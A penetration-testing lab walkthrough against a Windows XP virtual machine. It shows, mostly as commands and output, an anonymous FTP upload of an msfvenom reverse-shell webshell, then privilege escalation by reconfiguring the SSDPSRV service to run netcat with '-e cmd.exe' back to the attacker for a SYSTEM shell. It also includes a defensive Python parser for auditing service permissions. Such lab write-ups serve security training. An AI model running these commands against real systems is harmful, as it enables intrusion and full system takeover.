weak service permissions

lab environment:


  • Target : 192.168.178.25
  • Attack pc: Windows 10 (192.168.178.15) and some kali for msfvenom

Infiltration process:

The target machine we selected today is 192.168.178.14; as usual, we start with nmap port detection.

root@kali:~# nmap -sS -sV -p 1-1024 -Pn 192.168.178.25
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-26 14:21 EDT
Nmap scan report for 192.168.178.25
Host is up (0.00028s latency).
Not shown: 1017 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp open smtp Microsoft ESMTP 6.0.2600.5949
80/tcp open http Microsoft IIS httpd 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:7F:DA:07 (Oracle VirtualBox virtual NIC)
Service Info: Host: xppro; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.12 seconds

Analyzing the scan results, the target machine runs an FTP service and IIS 5.1.

First, check whether the FTP service allows anonymous login.

C:\Users\jacco>ftp 192.168.178.25
Connected to 192.168.178.25.
220-Microsoft FTP Service
220 Welcome to MS FTP
500 'OPTS UTF8 ON': command not understood
User (192.168.178.25:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
06-26-19 06:42PM 325432 accesschk_xp.exe
06-26-19 07:23PM <DIR> AdminScripts
06-26-19 07:23PM <DIR> ftproot
05-27-19 11:04AM <DIR> iissamples
06-26-19 06:46PM 9068 log.txt
05-27-19 11:04AM <DIR> mailroot
06-26-19 07:16PM 28160 nc.exe
05-27-19 11:04AM <DIR> Scripts
06-26-19 06:42PM 66560 whoami.exe
05-27-19 11:37AM <DIR> wwwroot
226 Transfer complete.
ftp: 503 bytes received in 0.02Seconds 25.15Kbytes/sec.
ftp>

Sure enough, FTP allows anonymous login, and the listing shows the IIS wwwroot directory. The natural idea is to upload a webshell into the wwwroot directory; the details follow.

root@kali:~/pwk# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.178.15 LPORT=4444 EXITFUNC=thread -f asp --arch x86 --platform win > xpvbsshell.asp
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38138 bytes

Upload xpvbsshell.asp via FTP:

c:\PENTEST>ftp 192.168.178.25
Connected to 192.168.178.25.
220-Microsoft FTP Service
220 Welcome to MS FTP
500 'OPTS UTF8 ON': command not understood
User (192.168.178.25:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> cd wwwroot
250 CWD command successful.
ftp> bin
200 Type set to I.
ftp> put xpvbsshell.asp
200 PORT command successful.
150 Opening BINARY mode data connection for xpvbsshell.asp.
226 Transfer complete.
ftp: 38138 bytes sent in 0.00Seconds 38138000.00Kbytes/sec.

Trigger the uploaded page:

C:\Users\jacco>curl http://192.168.178.25/xpvbsshell.asp

Wait for the incoming connection:

c:\Users\jacco>nc -lvp 4444
listening on [any] 4444 ...
192.168.178.25: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.178.15] from (UNKNOWN) [192.168.178.25] 1051: NO_DATA
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd c:\inetpub
cd c:\inetpub

C:\Inetpub>whoami
whoami
XPPRO\IWAM_XPPRO

C:\Inetpub>


Next, of course, the problem to consider is privilege escalation. Generally, there are several ways to escalate privileges:

  1. Use a privilege escalation vulnerability in the operating system itself or one of its own services, such as MS16-016 (CVE-2016-0051)
  2. Use a vulnerability in third-party software, such as MySQL (CVE-2016-6662/6663)
  3. A third one that is easily overlooked: exploit incorrectly configured file and service permissions.

In this case I will mainly demonstrate the third method. Before we start escalating privileges, we need two small tools:

  1. Icacls (Windows 7 and above) / cacls (Windows XP and Windows 2000) – the system's built-in tool for checking the permission configuration of a specific folder or file
  2. Accesschk (part of the Sysinternals suite) – used to check the permissions a specific user or group has on files, directories, registry keys, global objects, and Windows services

With these two useful tools, we can attempt privilege escalation.

First, in the shell, look through the system directory and find the path to the IIS web directory: C:\Inetpub\wwwroot\

Next, upload our tools (accesschk and netcat) the same way.

Run accesschk_xp.exe to check whether the current user has write access to any Windows service; a service configured with overly broad permissions is what will let us escalate.

C:\Inetpub>accesschk_xp.exe /accepteula -uwcqv * | more

Alerter
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
ALG
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
AppMgmt
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
AudioSrv
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
BITS
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS

-- snip --

SSDPSRV
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW S-1-5-32-549
        SERVICE_ALL_ACCESS
upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW S-1-5-32-549
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
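As an added audit example (not part of the original write-up), the Python below parses accesschk `-uwcqv *` output in the layout shown above and flags every service where a principal other than SYSTEM or Administrators holds a right that allows reconfiguring the service. The sample listing is constructed from the output above, and the trusted and dangerous sets are my assumptions; the same parser can be run over a full listing saved from a host you administer.

```python
import re

# Constructed sample in the layout accesschk prints for `-uwcqv *` (trimmed from the listing above).
SAMPLE = """\
SSDPSRV
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
        SERVICE_ALL_ACCESS
  RW S-1-5-32-549
        SERVICE_ALL_ACCESS
upnphost
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\\LOCAL SERVICE
        SERVICE_QUERY_STATUS
        SERVICE_CHANGE_CONFIG
"""

# Assumed trusted set: principals expected to control services; anyone else with these rights is a finding.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}
# Assumed dangerous set: rights that let the holder change the service binary/account or rewrite its DACL.
DANGEROUS = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER"}

def parse_accesschk(text):
    # Returns {service: {principal: set(rights)}}. Layout: service names at column 0,
    # "RW <principal>" / "R <principal>" lines indented, individual rights indented further.
    # Indentation, not letter case, decides what a line is (service names like BITS are all caps).
    services, svc, principal = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        access = re.match(r"^(RW|R|W)\s+(.+)$", line)
        if len(raw) - len(raw.lstrip()) == 0:      # new service name
            svc, principal = line, None
            services.setdefault(svc, {})
        elif access and svc is not None:            # access line: principal holding rights
            principal = access.group(2).strip()
            services[svc][principal] = set()
        elif principal is not None:                 # a single right granted to that principal
            services[svc][principal].add(line)
    return services

def weak_services(services, trusted=TRUSTED, dangerous=DANGEROUS):
    # Services where a principal outside the trusted set holds a reconfiguration right.
    findings = {}
    for svc, acl in services.items():
        for principal, rights in acl.items():
            hit = rights & dangerous
            if principal not in trusted and hit:
                findings.setdefault(svc, []).append((principal, sorted(hit)))
    return findings
```

For the sample this reports SSDPSRV (S-1-5-32-549 with SERVICE_ALL_ACCESS) and upnphost (LOCAL SERVICE with SERVICE_CHANGE_CONFIG), which is exactly the pair the write-up singles out.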

We find two Windows services that meet the condition: SSDPSRV and upnphost. Pick either one to examine further, for example SSDPSRV:

C:\Inetpub>accesschk_xp.exe /accepteula -uwcqv SSDPSRV
SSDPSRV
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW S-1-5-32-549
        SERVICE_ALL_ACCESS

A quick analysis shows that this service can be reconfigured to start a binary of our choosing under the NT AUTHORITY\SYSTEM account, which means we can obtain a reverse shell with SYSTEM privileges and complete the escalation. The specific commands are as follows:

C:\Inetpub>sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\system32\svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SSDP Discovery Service
DEPENDENCIES : HTTP
SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\Inetpub>
C:\Inetpub>sc config SSDPSRV binpath= "c:\inetpub\nc.exe -nv 192.168.178.15 9090 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub>
C:\Inetpub>sc config SSDPSRV obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub>
C:\Inetpub>sc config SSDPSRV start= "demand"
[SC] ChangeServiceConfig SUCCESS
C:\Inetpub>sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\inetpub\nc.exe -nv 192.168.178.15 9090 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SSDP Discovery Service
DEPENDENCIES : HTTP
SERVICE_START_NAME : LocalSystem

At this point, we have configured the SSDPSRV service to launch the nc reverse shell with SYSTEM privileges.

Open a new listener on the attacker machine (192.168.178.15):

c:\Users\jacco>nc -lvp 9090
listening on [any] 9090 ...

Start the SSDPSRV service on the target machine (192.168.178.25):

C:\Inetpub>net start SSDPSRV

Finally, we receive a reverse shell with SYSTEM privileges.

c:\Users\jacco>nc -lvp 9090
listening on [any] 9090 ...
192.168.178.25: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.178.15] from (UNKNOWN) [192.168.178.25] 1105: NO_DATA
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>\\10.11.0.112\puck\whoami.exe
\\10.11.0.112\puck\whoami.exe
NT AUTHORITY\SYSTEM

Summary

To summarize the penetration process of this case:

  1. Nmap for port detection
  2. Analyze the vulnerable services and exploit them
  3. Get a shell and check for insecurely configured Windows services
  4. Reconfigure the Windows service to execute the reverse shell with SYSTEM privileges
  5. Start the Windows service to obtain a SYSTEM shell